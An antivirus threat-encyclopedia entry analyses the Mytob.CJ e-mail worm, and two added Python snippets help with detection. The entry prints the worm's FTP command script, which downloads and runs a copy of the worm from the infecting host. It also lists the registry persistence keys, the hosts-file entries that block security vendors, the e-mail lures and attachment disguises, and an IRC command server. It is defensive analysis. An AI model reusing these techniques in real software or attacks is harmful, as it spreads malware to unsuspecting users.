Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

Win32/Mytob.CJ

Aliases: W32.Mytob.U@mm (Symantec), Win32.Worm.Mytob.GQ (Bitdefender), Net-Worm.Win32.Mytob.bx (Kaspersky), W32/Mytob.JW@mm (F-Prot)
Type: Mass Mailing E-mail Worm
Systems Affected: 32-Bit Windows

Introduction:

Mytob.CJ is a typical mass-mailing e-mail worm, approximately 50 KB to 55 KB in size. The worm is runtime-compressed with UPack, an executable runtime packer.

Installation and Autostart Techniques:

Upon execution, the worm copies itself into the System32 folder as "taskgmrs.exe" and drops the file HELLMSN.EXE (6050 bytes in size) into the root directory (normally C:\). HELLMSN.EXE is detected by NOD32 as W32/Mytob.I (MSN Messenger Spreading Component) and is runtime compressed by FSG.

Mytob.CJ creates copies of itself in the root directory using the names:

"funny_pic.scr"
"my_photo2005.scr"
"see_this!!.scr"

The worm creates a mutex "H-E-L-L-B-O-T" to avoid multiple running instances of itself on the same machine.

The worm adds the following registry entries so that it runs every time Windows starts:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINTASK" = "taskgmrs.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINTASK" = "taskgmrs.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"WINTASK" = "taskgmrs.exe"

MyTob.AW also adds the following registry keys:

HKLM\Software\Microsoft\OLE
"WINTASK" = "taskgmrs.exe"

HKCU\Software\Microsoft\OLE
"WINTASK" = "taskgmrs.exe"

HKLM\System\CurrentControlSet\Control\Lsa
"WINTASK" = "taskgmrs.exe"

HKCU\System\CurrentControlSet\Control\Lsa
"WINTASK" = "taskgmrs.exe"

Mytob.CJ monitors these registry keys and recreates them if they are not present anymore.

E-mail Harvesting:

The worm scans all fixed disks and is designed to collect e-mail addresses from files whose names match one of the following file extensions:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

The worm has a bug in the way it concatenates and compares strings against the WIN32_FIND_DATA results. As a consequence, the worm opens and scans a file for e-mail addresses as soon as at least one character of its extension matches, in the correct order, one of the extensions in the list above.

In technical terms, the worm compares file extensions with a substring ("instring") function rather than an exact comparison.

Example:

The worm will search for e-mail addresses in files whose extension is *.htm, *.ht, or *.h.
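The following Python snippet is an added example, not code from the write-up, that models the extension-comparison bug described above. It assumes the worm tests whether a file's extension occurs as a substring of each list entry instead of comparing for equality, which is the reading consistent with the ".htm, .ht, .h" example; the sample directory listing is constructed.

```python
# Added example (not from the write-up): models the substring-based extension
# check. ASSUMPTION: the worm asks "is this file's extension contained in a
# list entry?" instead of "is it equal to a list entry?".

HARVEST_EXTENSIONS = [".wab", ".adb", ".tbb", ".dbx", ".asp",
                      ".php", ".sht", ".htm", ".pl"]


def extension_of(filename):
    """Return the extension (with leading dot, lower-case) or '' if none."""
    dot = filename.rfind(".")
    return filename[dot:].lower() if dot > 0 else ""


def buggy_match(filename, exts=HARVEST_EXTENSIONS):
    """Substring comparison: '.h' is found inside '.htm', so stdio.h is scanned."""
    ext = extension_of(filename)
    return bool(ext) and any(ext in wanted for wanted in exts)


def exact_match(filename, exts=HARVEST_EXTENSIONS):
    """Equality comparison, the behaviour the author evidently intended."""
    return extension_of(filename) in exts


def extra_files_scanned(filenames):
    """Files the buggy check scans that an exact check would have skipped."""
    return [f for f in filenames if buggy_match(f) and not exact_match(f)]


if __name__ == "__main__":
    # Constructed sample directory listing.
    sample = ["index.htm", "notes.ht", "stdio.h", "main.c",
              "a.p", "photo.jpg", "x.s"]
    print(extra_files_scanned(sample))   # ['notes.ht', 'stdio.h', 'a.p', 'x.s']
```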

Mytob.CJ also collects e-mail addresses from the Windows Address Book and from the following folders:

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files
%System%

DNS Resolving:

The worm performs DNS MX (mail exchange) queries to find an appropriate mail server for each domain it tries to send itself to. If the MX lookup fails, the worm tries to guess the mail server by prepending the following prefixes to the domain name:

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.

E-mail Sender:

The worm generates the sender's e-mail addresses using the following list of names:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

to which it randomly adds a domain from an encrypted list of the following domain names stored in the worm:

aol.com cia.gov fbi.gov hotmail.com juno.com msn.com yahoo.com

Mytob.CJ uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail Subject Lines:

MyTob.CJ randomly selects an e-mail subject out of the following list:

Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
Good day

The e-mail subjects are encrypted and stored in the worm.

Message Body:

The e-mail contains one of the following message texts:

Mail transaction failed. Partial message is available.

The message contains Unicode characters and has been sent as a binary attachment.

The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.

The original message was included as an attachment.

Here are your banks documents.

E-mails with a blank message body, or with a body consisting of random strings, may also be sent.

E-mail Attachments:

The worm sends a copy of itself using one of the following file names:

body
message
test
data
file
text
doc
readme
document

with one of the following file extensions:

bat
cmd
exe
scr
pif
zip

The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:

htm
txt
doc

The second extension is chosen from the following list and is separated from the first extension by a large number of spaces to hide the executable file extension:

pif
scr
exe

Example: attachment "text.zip" may contain the file "text.txt {spaces}.scr"

The worm avoids e-mail addresses which contain parts of the following list:

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:, berkeley,
borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido, foo., fsf., gnu, gold-certs,
google, gov., help, hotmail, iana, ibm.com, icrosof, icrosoft, ietf, info, inpris, isc.o,
isi.e, kernel, linux, listserv, math, mit.e, mozilla, msn., mydomai, nobody, nodomai,
noone, not, nothing, ntivi, page, panda, pgp, postmaster, privacy, rating, rfc-ed, ripe.,
root, ruslis, samples, secur, sendmail, service, site, soft, somebody, someone, sopho,
spm, submit, support, syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster,
www, you, your, -._!, -._!@

Example: Since the worm avoids addresses with "icrosoft", both microsoft.com and Microsoft.com would be avoided.

Hostfile Manipulation:

The worm overwrites the existing hosts file with the following entries so that the listed sites can no longer be reached:

127.0.0.1 www.trendmicro.com
127.0.0.1 www.microsoft.com
127.0.0.1 trendmicro.com
127.0.0.1 rads.mcafee.com
127.0.0.1 customer.symantec.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 my-etrust.com
127.0.0.1 mast.mcafee.com
127.0.0.1 ca.com
127.0.0.1 www.ca.com
127.0.0.1 networkassociates.com
127.0.0.1 www.networkassociates.com
127.0.0.1 avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 kaspersky.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 viruslist.com
127.0.0.1 www.viruslist.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mcafee.com
127.0.0.1 www.mcafee.com
127.0.0.1 sophos.com
127.0.0.1 www.sophos.com
127.0.0.1 symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 www.symantec.com
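As an added example (not code from the write-up), the Python check below parses a hosts file and reports every name other than localhost that is mapped to a loopback address, which is how the entries above appear on an infected system; SAMPLE_HOSTS is a constructed input containing three of the entries listed above.

```python
# Added example (not part of the write-up): flag hosts-file lines that point
# names other than localhost at a loopback address, the pattern the worm uses
# to cut off security-vendor update sites.
import ipaddress

# Constructed sample: two legitimate lines plus three entries of the kind the
# worm writes (taken from the list in the write-up).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1 liveupdate.symantec.com
127.0.0.1 www.kaspersky.com
127.0.0.1 download.mcafee.com
"""

# Names that legitimately resolve to loopback and must not be reported.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Yield (line_no, address, [hostnames]) for each non-comment hosts line."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                          # malformed line, ignore it
        yield line_no, fields[0], [h.lower() for h in fields[1:]]


def find_sinkholed_hosts(text):
    """Return [(line_no, hostname)] for non-local names mapped to loopback."""
    hits = []
    for line_no, addr, names in parse_hosts(text):
        try:
            if not ipaddress.ip_address(addr).is_loopback:
                continue
        except ValueError:
            continue                          # not an IP literal, skip it
        for name in names:
            if name not in LOCAL_NAMES:
                hits.append((line_no, name))
    return hits


if __name__ == "__main__":
    for line_no, name in find_sinkholed_hosts(SAMPLE_HOSTS):
        print(f"line {line_no}: {name} is redirected to loopback")
```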

Exploiting Technologies:

The worm tries to connect to randomly generated IP addresses on port 445 to exploit the LSASS buffer overflow vulnerability [see MS04-011]. If the exploit succeeds, shellcode runs on the target machine and instructs it to connect back to the infecting host to retrieve a copy of the worm. This copy is downloaded to the target machine over an FTP connection driven by the 2pac.txt FTP command file described below.

The worm also takes advantage of the DCOM RPC vulnerability [see MS03-026] for spreading.

The 2pac.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
binary
get bingoo.exe
quit

The worm runs FTP.EXE locally on the compromised system to retrieve a copy of the worm named "bingoo.exe" from the infecting system, and starts that file once the download completes.

References:

http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Other Details:

The worm also provides IRC backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer

and connects to the following IRC server:

hellbot.j2ee.us

The worm tries to send copies via MSN Messenger to all online contacts in the contact list.

History: Analysis and Write-up by: Michael St. Neitzel